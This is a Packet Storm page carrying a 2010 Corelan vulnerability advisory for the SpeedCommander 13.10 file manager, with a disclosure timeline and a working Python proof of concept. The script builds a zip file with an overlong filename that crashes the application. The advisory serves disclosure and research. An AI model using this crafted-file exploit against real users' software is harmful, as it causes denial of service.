exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Speed Commander 13.10 Memory Corruption

Speed Commander 13.10 Memory Corruption
Posted Apr 20, 2010
Authored by TecR0c | Site corelan.be

SpeedCommander version 13.10 suffers from a memory corruption denial of service vulnerability. Exploit included.

tags | exploit, denial of service
SHA-256 | ca3fcff87584ab42c2a2013194c68b8c234aabd62272a8f654f1f54713f24a0a

Speed Commander 13.10 Memory Corruption

Change Mirror Download

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-028
Disclosure date : April 20th, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028


00 : Vulnerability information
Product : SpeedCommander
Version : 13.10 (latest version)
Vendor : SpeedProduct
URL : http://www.speedproject.de
Platform : Windows
Type of vulnerability : Memory Corruption Risk rating : Med Issue fixed in version : not fixed Vulnerability discovered by : TecR0c Corelan Team :
http://www.corelan.be:8800/index.php/security/corelan-team-members/


01 : Vendor description of software

"The SpeedCommander application was designed to be a comfortable file manager.

It builds on the proven two window technology and offers a multitude of exclusive features. Sort, copy, move or delete your files either using the keyboard or the mouse."


02 : Vulnerability details

A flaw in how the application handles a overly long zip filename which an attacker can utilize in a manner other than the designer intended. A memory corruption will occur which will result in a "SpeedCommander.exe encountered a problem in module CxZip61u.dll and needs to close."


03 : Author/Vendor communication

March 31th, 2010 : author contacted
April 9th, 2010 : sent reminder
April 20th, 2010 : No response, public disclosure


04: Proof of Concept

#!/usr/bin/python
# #######################################################################
# Title: Speed Commander 13.10 (.zip) Memory Corruption
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Found by: TecR0c
# Download: http://www.sp-download.de/sc13/sc13.exe
# Platform: Windows XP sp3 En
# Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Trigger : Open the application, Browse to the zip file > double click = BOOM!

print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] SpeedCommander (.zip) - by TecR0c"


ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")

buff = "\x41" * 4064
buff += ".txt"

mefile = open('SpeedCommander.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close